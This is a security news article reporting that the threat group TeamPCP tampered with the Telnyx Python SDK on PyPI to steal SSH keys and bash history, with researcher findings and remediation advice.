TeamPCP has again expanded its supply chain attacks on open-source repositories by targeting Telnyx, according to security researchers.
The cyber threat group recently rose to notoriety by uploading malicious packages to Python Package Index (PyPI), the official online repository where developers share and download Python software packages. The group typically uses typosquatting to trick developers into downloading them.
In one campaign, the group targeted Trivy, a widely used open-source vulnerability scanner owned by Aqua Security, by injecting credential-stealing malware into official releases and GitHub Actions.
A few days later, researchers discovered TeamPCP targeted LiteLLM AI Gateway, a popular Python library for AI model integration.
Now, a third TeamPCP campaign has been identified which affects the Telnyx Python package on PyPI and leads to the delivery of credential-stealing malware.
Telnyx is a cloud communications platform that provides application programming interfaces (APIs) for phone calls, SMS, MMS and other telecom services.
TeamPCP’s Telnyx Compromise Campaign Explained
On March 27, researchers from both Socket and Endor Labs published findings revealing that the official Telnyx Python software development kit (SDK) had been compromised in a software supply chain attack.
Socket researchers identified that the telnyx package, a legitimate and widely used Python SDK for the Telnyx communications platform, had been tampered with. The malicious versions published to PyPI – versions 4.87.1 and 4.87.2 – contained code designed to exfiltrate sensitive information from victim environments.
“They should not be used,” warned the Socket Research Team, whose members confirmed that researchers at Aikido Security and Wiz, now part of Google Cloud, independently came to the same conclusions.
Socket found that the attacker had injected functionality to steal SSH private keys and bash history files from compromised systems, sending that data to an attacker-controlled remote server. The malicious payload was designed to execute at install time, meaning a developer or automated pipeline simply installing or updating the package would trigger the attack without needing to import or run any of the package’s actual functionality.
Endor Labs researchers confirmed Socket’s findings and further explained that the threat actor gained the ability to publish malicious versions of the telnyx package by compromising the credentials of a maintainer account.
This is a particularly dangerous attack vector because it does not require vulnerabilities in PyPI’s infrastructure itself to be exploited.
Instead, the attacker leveraged legitimate publishing access to push trojanized versions that would appear authentic to any automated or manual dependency resolution process.
Because the package retained its legitimate name and continued to function as expected for its intended purpose, detection through casual inspection or functional testing would be extremely difficult.
Socket researchers noted that the injected payload specifically targeted files that would be of high value in a lateral movement or credential harvesting context.
SSH private keys would allow an attacker to pivot to other systems the victim has access to, while bash history files could expose commands containing credentials, server addresses, internal tooling or other sensitive operational information. The data exfiltration was performed over HTTP to an external endpoint controlled by the attacker.
Telnyx Campaign Reflects TeamPCP’s Growing Sophistication
Endor Labs researchers emphasized that the pattern exhibited by TeamPCP reflects a maturation in supply chain attack methodology.
Rather than relying solely on typosquatting, which depends on a developer making a naming mistake, this actor has demonstrated the capability and willingness to directly compromise legitimate, trusted packages with real user bases.
Endor Labs researchers argued that this significantly raises the risk profile because developers and security teams who explicitly trust a known package and pin to it by name are not protected against this class of attack.
Additionally, the three-day interval between the LiteLLM and Telnyx compromises further suggested that the actor was actively iterating and moving quickly across targets rather than executing a single opportunistic event.
According to Socket, TeamPCP has recently started partnering with the Vect ransomware group to turn supply chain compromises into large-scale ransomware operations.
Socket and Endor Labs researchers recommended that organizations audit their environments for the presence of the malicious versions and rotate any credentials or keys that may have been exposed on systems where the compromised package was installed.
